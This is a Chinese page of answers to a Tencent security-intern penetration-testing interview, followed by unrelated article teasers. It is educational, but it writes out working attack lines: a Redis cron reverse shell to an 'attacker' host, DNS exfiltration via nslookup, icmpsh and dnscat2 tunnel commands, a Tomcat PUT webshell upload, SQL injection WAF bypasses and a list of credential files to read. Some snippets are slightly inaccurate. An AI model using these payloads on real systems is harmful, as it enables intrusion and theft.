2025年渗透测试面试题总结-腾讯[实习]安全研究员(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
腾讯[实习]安全研究员
1. 自我介绍
2. SQL二次注入原理
3. 二次注入修复方案
4. SQL注入绕WAF(过滤information)
5. Redis未授权访问漏洞
6. 渗透测试流程
7. CTF印象深题(例题)
8. 文件下载漏洞利用
9. 关键读取文件列表
10. HTTP不出网命令执行处理
11. 隧道通信详解
12. 漏洞预警处理流程
13. 中间件漏洞复现案例
14. 学校攻防演练职责
腾讯[实习]安全研究员
1. 自我介绍 2. sql注入了解吗,讲一讲二次注入的原理 3. 二次注入要怎么修复 4. sql注入过waf了解吗,若一个sql注入过滤了information关键词,怎么绕过 5. Redis未授权访问 6. 渗透测试的一个完整流程 7. 打ctf的时候有没有遇到什么印象特别深的题目 8. 文件下载漏洞有没有什么比较好的利用方式 9. 利用文件下载漏洞找文件名具体是找什么文件名(读取文件一般会读取哪些文件)(ctf中?实战中?) 10. 命令执行漏洞,http不出网有什么比较好的处理方法(发散一点说) 11. 接上一题,通过隧道通信,详细讲讲通过什么类型的隧道,讲讲具体操作 12. 漏洞预警 13. 有没有复现过中间件类型的漏洞(有没有完整的复现过漏洞) 14. 在学校的攻防演练中扮演的角色的主要职责是什么1. 自我介绍
我是网络安全领域的AI助手,专注于渗透测试、漏洞分析与防御方案研究。回答内容基于OWASP标准、CTF赛事经验及实战攻防场景。
2. SQL二次注入原理
核心流程:
- 存储阶段:攻击者提交恶意数据(如
admin'#)被存入数据库(如注册用户名)- 触发阶段:当应用调用该数据拼接SQL时(如修改密码操作),构造出
UPDATE users SET password='new_pwd' WHERE user='admin'#',导致#后的条件失效,从而修改admin密码。
3. 二次注入修复方案
sql-- 修复代码示例(参数化查询) cursor.execute("UPDATE users SET password=%s WHERE username=%s", (new_pwd, username))综合措施:
- 输入校验:过滤单引号、分号等特殊字符
- 最小权限:数据库账户仅授权必要操作
- 敏感操作审计:监控异常SQL执行日志
4. SQL注入绕WAF(过滤
information)绕过方案:
- 替代关键词:
sqlSELECT table_name FROM sys.schema_tables -- MySQL 8.0+替代information_schema- 编码混淆:
sqlSELECT 1 FROM /*!50000 information*/.tables -- 利用MySQL版本注释- 字符串拼接:
sqlSELECT 'inf'||'ormation_schema'.tables -- PostgreSQL/MySQL字符串连接
5. Redis未授权访问漏洞
利用方式:
bashredis-cli -h 目标IP FLUSHALL # 清空数据库 echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1\n\n" | redis-cli -h 目标IP -x set 1 redis-cli -h 目标IP config set dir /var/spool/cron/ redis-cli -h 目标IP config set dbfilename root防御:启用认证(
requirepass)、绑定127.0.0.1、限制防火墙策略。
6. 渗透测试流程
mermaidgraph TD A[信息收集] --> B[漏洞扫描] B --> C{漏洞验证} C -->|存在风险| D[渗透利用] C -->|无风险| E[生成报告] D --> F[权限提升] F --> G[数据获取] G --> H[痕迹清理] H --> E
7. CTF印象深题(例题)
题型:Java反序列化+内存马注入
解法:
- 分析JRMP协议流量
- 构造Gadget链触发Tomcat Filter注入
- 通过内存Shell绕过文件上传检测
8. 文件下载漏洞利用
高阶利用:
- 路径穿越:
/download?file=../../../../etc/passwd- 结合解析漏洞:下载
.htaccess覆盖配置使图片执行PHP- SSRF组合:利用
file://协议读取本地文件
9. 关键读取文件列表
场景 目标文件示例 CTF /proc/self/environ, /flag, .git/config 实战 /etc/shadow, ~/.ssh/id_rsa, WEB-INF/web.xml 云环境 /meta-data/iam-role-credentials
10. HTTP不出网命令执行处理
四类解决方案:
- DNS通道:
nslookup $(whoami).attacker.com- ICMP隧道:使用
ptunnel传输数据- 延时盲注:通过
sleep $(id|cut -c1)逐位提取- 临时文件:重定向输出到Web目录(如
/var/www/html/result)
11. 隧道通信详解
ICMP隧道(icmpsh)操作:
bash# 攻击端 ./icmpsh_m.py 攻击者IP 目标IP # 目标机(无网状态下) ./icmpsh.exe -t 攻击者IP -d 500 -s 30DNS隧道(dnscat2):
bashdnscat2-server --secret=密钥 attacker.com dnscat2-client --secret=密钥 attacker.com
12. 漏洞预警处理流程
- 订阅CVE公告(NVD、CNVD)
- 验证漏洞影响范围(版本比对)
- 搭建沙箱复现漏洞
- 制定临时防御策略(如WAF规则)
- 协调补丁更新窗口期
13. 中间件漏洞复现案例
漏洞:Apache Tomcat CVE-2017-12615(PUT任意文件上传)
复现步骤:httpPUT /shell.jsp/ HTTP/1.1 Host: target:8080 Content-Length: 25 <% Runtime.exec("cmd"); %>修复:升级版本或配置
readonly=true。
14. 学校攻防演练职责
防守方核心任务:
- 实时监控:分析WAF、IDS告警日志(如Suricata规则匹配)
- 溯源反制:通过蜜罐捕获攻击者IP及手法
- 应急响应:隔离感染主机(如阻断3389端口)
- 加固实施:关闭高危服务(如SMBv1)
相关文章:
2025年渗透测试面试题总结-腾讯[实习]安全研究员(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 腾讯[实习]安全研究员 1. 自我介绍 2. SQL二次注入原理 3. 二次注入修复方案 4. SQL注入绕WAFÿ…...
Vue:Form正则校验
目录 1. 只能输入正整数或正小数(保留三位小数) 1. 只能输入正整数或正小数(保留三位小数) cc: [{required: true, message: "钻杆长度不能为空", trigger: "blur" },{pattern: /^\d(\.\d{1,3})?$/, message: 只能输入正整数或正小数(保留三位小数), tri…...
如何处理React中表单的双向数据绑定?
在前端开发中,双向数据绑定(Two-way Data Binding)是指视图(View)与数据模型(Model)之间保持同步:当模型发生变化时,视图会自动更新;当视图(用户输…...
时间序列预测的机器学习方法:从基础到实战
时间序列预测是机器学习中一个重要且实用的领域,广泛应用于金融、气象、销售预测、资源规划等多个行业。本文将全面介绍时间序列预测的基本概念、常用方法,并通过Python代码示例展示如何构建和评估时间序列预测模型。 1. 时间序列预测概述 时间序列是按…...
01-VMware16虚拟机详细安装
官网地址:https://www.vmware.com/cn.html 1.1 打开下载好的 .exe 文件, 双击安装。 1.2 点击下一步 1.3 先勾选我接受许可协议中的条款,然后点击下一步 1.4 自定义安装路径,注意这里的文件路径尽量不要包含中文,完成…...
sql列中数据通过逗号分割的集合,按需求剔除部分值
前置 不会REGEXP 方法的需要在这里学习一下下 记sql字段逗号分隔,通过list查询 功能点 现有一个表格中一列存储的是标签的集合,通过逗号分割 入下: 其中tag_ids是逗号分割的标签,现在需要删除标签组中的一些标签,因…...
下一代设备健康管理解决方案:基于多源异构数据融合的智能运维架构
导语: 在工业4.0深度演进的关键节点,传统设备管理面临数据孤岛、误诊率高、运维滞后三大致命瓶颈。本文解析基于边缘智能与数字孪生的新一代解决方案架构,并实测验证中讯烛龙PHM-X系统如何通过多模态感知→智能诊断→自主决策闭环,…...
unipp---HarmonyOS 应用开发实战
HarmonyOS 应用开发实战指南 1. 开篇:为什么选择 HarmonyOS? 最近在开发鸿蒙应用时,发现很多开发者都在问:为什么要选择 HarmonyOS?这里分享一下我的看法: 生态优势 华为手机用户基数大,市场潜…...
Go 语言中switch case条件分支语句
1. 基本语法 package main import "fmt" func main() {var extname ".css"switch extname {case ".html":fmt.Println("text/html")case ".css":fmt.Println("text/css") // text/csscase ".js":fmt.…...
ai流式文字返回前端和php的处理办法
PHP后端 php端主要是用到ob_flush和flush,头改为流式。 基本代码 代码如下: <?php header(Content-Type:text/event-stream); header(Cache-Control:no-cache); header(Connection:keep-alive);function streamPostRequest($url,$data){$chcurl_…...
深入理解JavaScript设计模式之闭包与高阶函数
目录 前言小序一场失败面试面试后的觉醒 闭包变量作用域:谁的地盘听谁的变量的生命周期:该走了,不该走的还在闭包的更多作用:不只是谈恋爱,还能干活!1、封装私有变量:你的变量我来守护2、延长变…...
)
【Unity】R3 CSharp 响应式编程 - 使用篇(二)
一、通用的事件监听用法 using System;using R3;using UnityEngine;namespace Aladdin.Standard.Observable.Common{public class CommonObservable : MonoBehaviour{// 默认会调用1次public SerializableReactiveProperty<int> serializableReactiveProperty;…...
springboot启动mapper找不到方法对应的xml
数据源配置 目录结构 idea中mapper.java 可以找到对应的mapper.xml文件 启动却找不到 因为mapper.db1会被识别为文件名 而非目录结构 调整为这种...
MQTT协议:物联网时代的通信基石
MQTT协议:物联网时代的通信基石 在当今快速发展的物联网(IoT)时代,设备之间的通信变得尤为重要。MQTT(Message Queuing Telemetry Transport)协议作为一种轻量级的消息传输协议,正逐渐成为物联…...
vite ts 配置使用@ 允许js
1.vite.config.ts 配置 import { defineConfig } from vite import vue from vitejs/plugin-vue import { fileURLToPath, URL } from node:url import setup_extend from vite-plugin-vue-setup-extend// https://vite.dev/config/ export default defineConfig({plugins: …...
Electron通信流程
前言 今天讲Electron框架的通信流程,首先我们需要知道为什么需要通信。这得益于Electron的多进程模型,它主要模仿chrome的多进程模型如下图: 作为应用开发者,我们将控制两种类型的进程:主进程和渲染器进程 。 …...
华为云Flexus+DeepSeek征文|华为云Flexus服务器dify平台通过自然语言转sql并执行实现电商数据分析
目录 前言 1 华为云Flexus服务器部署Dify平台 1.1 华为云Flexus服务器一键部署Dify平台 1.2 设置账号登录Dify,进入平台 2 构建自然语言转SQL并执行的应用 2.1 创建应用并启动工作流设计 2.2 应用框架设计 2.3 自然语言转SQL模块详解 2.4 代码执行模块实现…...
IDEA中微服务指定端口启动
在使用IDEA开发SpringBoot微服务时,经常需要开启多个服务实例以测试负载均衡,以下几种方法开启不同端口。 直接在配置文件中指定 # application.propertiesserver.port8001指定VM参数 点击Modify options,选择Add VM options,值…...
BERT, GPT, Transformer之间的关系
1. Transformer 是什么?简单介绍 1.1 通俗理解 想象你是一个翻译员,要把一句话从中文翻译成英文。你需要同时看句子里的每个词,理解它们之间的关系。Transformer就像一个超级翻译助手,它用“自注意力机制”(Attentio…...
Spring Cloud Alibaba Seata安装+微服务实战
目录 介绍核心功能三层核心架构安装微服务实战创建三个业务数据库编写库存和账户两个Feign接口订单微服务 seata-order-service9701库存微服务 seata-store-service9702账户微服务 seata-account-service9703测试结果 总结 介绍 Spring Cloud Alibaba Seata 是一款开源的分布式…...
FMC STM32H7 SDRAM
如何无痛使用片外SDRAM? stm32 已经成功初始化了 STM32H7 上的外部 SDRAM(32MB) 如何在开发中无痛使用SDRAM 使它像普通 RAM 一样“自然地”使用? [todo] 重要 MMT(Memory Management Tool) of STM32CubeMx The Memory Management Tool (MMT) disp…...
部署DNS从服务器
部署DNS从服务器的目的 DNS域名解析服务中,从服务器可以从主服务器上获得指定的区域数据文件,从而起到备份解析记录与负载均衡的作用,因此通过部署从服务器可以减轻主服务器的负载压力,还可以提升用户的查询效率。 注意…...
)
Ubuntu 系统.sh脚本一键部署内网Java服务(组件使用docker镜像,宕机自启动)
#!/bin/bash# 更新系统并安装必要的依赖 sudo apt update sudo apt install -y apt-transport-https ca-certificates curl software-properties-common# 安装 Docker curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - sudo add-apt-repository …...
用 n8n 提取静态网页内容:从 HTTP Request 到 HTML 节点全解析
n8n 的 HTTP Request HTML 节点组合是个实用又高效的工具。这篇文章就带你一步步搞懂如何用它们提取静态网页内容,重点解析 HTML 节点参数和 CSS 选择器,让你轻松上手 。 一、整体流程概览 我们的目标是从静态网页中提取特定内容,流程分两…...
Android Camera Hal中通过Neon指令优化数据拷贝
背景描述: Camera apk普通相机模式录像操作时,一般是同时请求两个流,即预览流和录像流。对于两个流输出图像格式和分辨率相同的情况下,是不是可以通过一个流拷贝得到另一个流的数据,进而节省掉一个Sensor输出处理两次…...
C# winform教程(二)----button
一、button的使用方法 主要使用方法几乎都在属性内,我们操作也在这个界面 二、作用 用户点击时触发事件,事件有很多种,可以根据需要选择。 三、常用属性 虽然属性很多,但是常用的并不多 3.常用属性 名称内容含义AutoSize自动调…...
AcWing 3417:砝码称重——位集合
【题目来源】 3417. 砝码称重 - AcWing题库 【题目描述】 你有一架天平和 N 个砝码,这 N 个砝码重量依次是 W1,W2,⋅⋅⋅,WN。 请你计算一共可以称出多少种不同的正整数重量? 注意砝码可以放在天平两边。 【输入格式】 输入的第一行包含一个整数 N。 …...
我认为STM32输入只分为模拟输入 与 数字输入
核心概念解析 模拟输入 (Analog Input) 设计目的:直接连接模拟信号(如ADC采集电压、温度传感器输出) 硬件行为: ✅ 断开内部数字电路(施密特触发器禁用) ✅ 信号直通模拟外设(如ADC、运放&…...
Python编码格式化之PEP8编码规范
文章目录 概要PEP8编码风格py文本组织规范命名规范编码风格 PEP8编码检查工具pylintflake8PyCharm中配置检查工具 PEP8编码格式化工具blackautopep8PyCharm配置格式化工具本地git配置hook 总结 概要 在Python项目开发过程中,代码的可读性和一致性对于项目的长期维护…...
【Zephyr 系列 14】使用 MCUboot 实现 BLE OTA 升级机制:构建安全可靠的固件分发系统
🧠关键词:Zephyr、MCUboot、OTA 升级、BLE DFU、双分区、Bootloader、安全固件管理 📌面向读者:希望基于 Zephyr 为 BLE 设备加入安全 OTA 升级功能的开发者 📊预计字数:5200+ 字 🧭 前言:为什么你需要 OTA? 随着设备部署数量增多与产品生命周期延长,远程升级(…...